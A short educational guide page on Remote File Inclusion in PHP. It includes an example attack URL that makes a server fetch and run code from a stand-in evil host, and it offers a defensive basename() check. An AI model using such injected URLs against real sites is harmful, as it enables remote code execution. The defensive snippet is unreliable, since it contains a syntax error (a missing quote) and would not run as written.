23 lines
1.2 KiB
Markdown
23 lines
1.2 KiB
Markdown
|
---
|
||
|
|
title: Remote File Inclusion
|
||
|
|
---
|
||
|
|
## Remote File Inclusion
|
||
|
|
|
||
|
|
A vulnerability in the application caused by the programmer requiring a file input provided by the user and not sanitizing the input before accessing the requested file. This results in a file being pulled from a remote server and included where it should not of been.
|
||
|
|
|
||
|
|
### Example remote file inclusion attacks
|
||
|
|
A website allows you to view PDFs as `download.php?file=myfile.php`, due to a lack of proper checking a malicious user is able to request a remote resource and include in the script. The URL could become `download.php?file=http://myevilserver.gtld/evilcode.php` this could then be outputted to the user or in severe cases run the actual PHP code on your server.
|
||
|
|
|
||
|
|
### Defending your website from remote file inclusion attacks in PHP
|
||
|
|
The following PHP code will provide strong protection against a remote file inclusion attacks
|
||
|
|
```PHP
|
||
|
|
<?php
|
||
|
|
if(basename($_GET['file]) !== $_GET['file']) {
|
||
|
|
die('INVALID FILE REQUESTED');
|
||
|
|
}
|
||
|
|
```
|
||
|
|
* You can disable `allow_url_fopen` in your php.ini file as an added protection against remote file inclusion.
|
||
|
|
|
||
|
|
#### More Information:
|
||
|
|
* <a href="https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion" rel="nofollow">OWASP Wiki - Testing for Remote File Inclusion</a>
|